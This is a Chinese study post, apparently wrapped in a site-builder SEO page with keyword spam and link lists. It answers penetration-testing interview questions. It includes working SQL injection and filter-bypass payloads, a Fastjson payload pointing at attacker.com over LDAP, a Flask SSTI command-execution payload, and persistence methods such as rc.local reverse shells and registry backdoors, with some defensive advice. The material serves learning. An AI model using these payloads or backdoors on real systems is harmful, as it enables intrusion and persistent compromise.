当前位置: 首页 > wzjs >正文

济南网站制作运营高端建站网站

济南网站制作运营,高端建站网站,什么是网站的主页,上海的网站开发公司电话网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 字某跳动-渗透测试实习生 渗透流程信息收集如何处理子域名爆破中的泛解析问题绕过CDN寻找真实IPPHPINFO页面关注…

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

字某跳动-渗透测试实习生

渗透流程信息收集如何处理子域名爆破中的泛解析问题绕过CDN寻找真实IPPHPINFO页面关注信息有没有了解权限维持举例一个漏洞详细描述输出到href的xss如何防御samesite防御CSRF的原理CSRF的防御json格式的CSRF如何防御浏览器解析顺序和解码顺序过滤逗号的sql注入如何绕过过滤limit后的逗号如何绕过fastjson相关漏洞Python相关的漏洞回答(flask、SSTI原理)

1. 渗透流程

  1. 情报收集
    • 被动收集:Whois查询、证书透明度日志(CT Logs)、GitHub代码泄露。
    • 主动探测:子域名爆破(使用Amass/Sublist3r)、端口扫描(Masscan/Nmap)。
  2. 漏洞分析
    • 自动化扫描:AWVS/Nessus检测常见漏洞(SQLi/XSS)。
    • 手动验证:验证误报漏洞,如逻辑漏洞(越权/支付绕过)。
  3. 攻击利用
    • 漏洞利用:通过Metasploit或定制化EXP攻击目标(如ThinkPHP RCE)。
    • 权限提升:利用内核漏洞(DirtyCow)或SUID提权(find / -perm -4000)。
  4. 权限维持
    • 植入WebShell:加密后门(如蚁剑AES加密Shell)。
    • 系统后门:Windows注册表后门、Linux cronjob定时任务。
  5. 横向移动
    • 内网渗透:利用Responder抓取Net-NTLM哈希、Pass-The-Hash攻击。
    • 数据窃取:通过DNS隧道或HTTP隐蔽信道外传数据。

2. 子域名爆破中的泛解析问题处理

泛解析问题:所有未注册子域名解析到同一IP(如*.example.com → 1.1.1.1)。
解决方案

  1. 响应指纹去重
    • 对比HTTP响应头(Server/Cookie)和页面哈希(如SimHash)。
    • 使用工具(FFUF/GoBuster)的-mc参数过滤重复状态码。
  2. 证书透明度日志
    • 通过crt.sh 查询合法子域名证书记录。
  3. 历史DNS记录
    • 使用SecurityTrails/ViewDNS查询历史A记录。
  4. 字典智能生成
    • 基于目标业务关键词生成子域(如dev/api/test)。

3. 绕过CDN寻找真实IP的六种方法

  1. DNS历史记录:通过DNSDB查询目标域名历史解析IP。
  2. 全球Ping测试:多地服务器(AWS EC2/DigitalOcean)执行pingcurl
  3. SSL证书关联:Censys搜索相同证书的IP(parsed.names:example.com )。
  4. 敏感子域名:访问mail.example.cominternal.example.com 可能直连真实IP。
  5. 邮件服务器追踪:注册目标服务触发邮件,解析邮件头Received字段。
  6. SSRF漏洞利用:通过目标服务器的SSRF漏洞获取内网IP。

4. PHPINFO页面关键信息审计

  1. 敏感配置项
    • allow_url_fopen=On:允许远程文件包含(RFI)。
    • disable_functions:未禁用system/shell_exec等危险函数。
  2. 环境变量泄露
    • $_SERVER['DB_HOST']$_ENV['API_KEY']
  3. 临时文件路径
    • upload_tmp_dir可能暴露可写目录路径。
  4. 扩展模块风险
    • 启用imap扩展可能导致CVE-2018-19518漏洞。

5. 权限维持技术详解

  1. WebShell持久化
    • 隐藏文件名:.config.php + 修改文件时间戳(touch -t)。
  2. 系统级后门
    • Windows:注册表键HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon添加启动脚本。
    • Linux:/etc/rc.local 添加反向Shell命令。
  3. 内存驻留马
    • Java内存马:通过JSP注入Filter型内存Shell。
    • PHP内存马:利用php-fpm未授权访问注入。

6. 漏洞示例:SQL注入(以MySQL为例)

漏洞原理:未过滤用户输入的id参数直接拼接SQL语句。
利用Payload

/product?id=1' UNION SELECT 1,@@version,3-- -

攻击效果:泄露数据库版本、用户权限等敏感信息。
修复方案

  • 使用预编译语句(PDO/MyBatis)。
  • 输入过滤:正则匹配/[^0-9]/限制为数字。

7. 输出到href的XSS防御

漏洞示例:html

<a href="{{ user_input }}">Link</a> <!-- 用户输入为javascript:alert(1) -->

防御措施

  1. 协议白名单:仅允许http:///https:///mailto:
  2. URL编码:对href值进行HTML实体编码(如&&amp;)。
  3. CSP策略:设置Content-Security-Policy: default-src 'self'
  4. 框架安全:Vue/React自动转义href中的动态内容。

8. SameSite防御CSRF原理

  • SameSite=Strict:完全禁止跨站请求携带Cookie(如银行转账)。
  • SameSite=Lax:允许GET请求携带Cookie(适用于普通站点)。
  • SameSite=None:必须与Secure属性共用(仅限HTTPS)。

9. CSRF防御方案

  1. Token验证:表单中嵌入随机Token(如Django的{% csrf_token %})。
  2. 双重Cookie:请求头中携带Cookie哈希值(如X-CSRF-Token: hash(cookie))。
  3. Referer检查:验证请求来源域名是否在白名单内。

10. JSON格式CSRF防御

  1. Content-Type校验:拒绝非application/json请求。
  2. Token嵌入JSON:json
    { "data": "test", "csrf_token": "random_value" }
  3. 禁用CORS:设置Access-Control-Allow-Origin为特定域名。

11. 浏览器解析与解码顺序

  1. HTML解析优先
    • 解析标签和实体(如&lt;<)。
  2. JavaScript执行
    • 处理Unicode转义(如\u003c<)。
  3. URL解码
    • 转换%20为空格。
      示例:html
<a href="javascript:alert(1%26%23x29;)"></a> 

解码顺序:%26&&#x29;) → 最终执行alert(1)


12. 过滤逗号的SQL注入绕过

场景SELECT 1,2,3被拦截。
绕过方法

  1. JOIN语法:sql
    UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
  2. LIMIT OFFSET:sql
    UNION SELECT 1 FROM users LIMIT 1 OFFSET 1 

13. 过滤LIMIT逗号的绕过

场景LIMIT 0,1被拦截。
绕过方法

  1. SQL Server语法:sql
    SELECT TOP 1 * FROM users 
  2. 变量赋值(MySQL):sql
    SELECT * FROM users LIMIT 1 OFFSET 0 

14. Fastjson漏洞解析

漏洞根源:反序列化时自动调用getter/setter方法(如CVE-2022-25845)。
利用条件:目标开启autoType功能。
Payload示例:json

{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://attacker.com/exp" } 

修复方案:升级到Fastjson 1.2.83+,关闭autoType


15. Python漏洞:Flask SSTI

漏洞原理:未过滤用户输入直接渲染模板。
示例代码:python

@app.route('/hello/<name>') def hello(name): return render_template_string(f'Hello {name}!') 

攻击Payload:python

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

防御措施

  1. 使用安全模板引擎(Jinja2自动转义)。
  2. 输入过滤:禁止用户输入{{}}等特殊字符。
http://www.dtcms.com/wzjs/789948.html

相关文章:

  • 天津河北做网站的公司国外网站icp备案
  • a做爰网站怎么区分模板网站
  • 个人备案网站可以做论坛吗浙江网站建设 seo
  • 做外贸的 需要什么样的网站虚拟机中建设iis网站
  • 潍坊微信网站制作网站学什么专业
  • 免费在线网站建设网站快捷按钮以什么方式做
  • 无锡网站制作怎么样wordpress 置顶 函数
  • 佛山建网站公司哪家好网络营销策划书包括哪些内容
  • 网站建设公司怎样域名大全 二级域名
  • 制作网页的的网站利用国外免费空间做网站
  • 旅游网站的建设与应用建设的网站服务器
  • 网站建设服微信公众号接口开发
  • 可信网站验证素材下载网站源码
  • 网站建设都是需要什么软件网站app建设图片
  • 大理州建设局门户网站网站备案 个人 单位
  • 禁止同ip网站查询列举网站开发常用的工具
  • 如何做网站制作游戏网站服务器租用
  • 网站开发的费用计入什么科目免费源码资源网
  • 怎么确定电商网站建设的目标自己的网站怎么做跳转
  • 中国网站开发用盗版犯法郑州直播网站建设
  • 网站页面一般做多大推广软文300字范文
  • 网站左侧 导航网站字体字号
  • 山东网站开发制作网站换了域名还被k站不
  • 网站建设实训报告册中山建设网站的公司
  • 微网站 pc网站同步wordpress搭建两个主题
  • 如何做文档附网站做二手车有哪些网站有哪些手续费
  • 免费网站怎么做排名建设一个网站得多少钱
  • 长沙推广网站中英文双语企业网站
  • 网站改版公司哪家好制作书签的感受心得
  • 中国建设银行网站如何注册长沙seo优化推广公司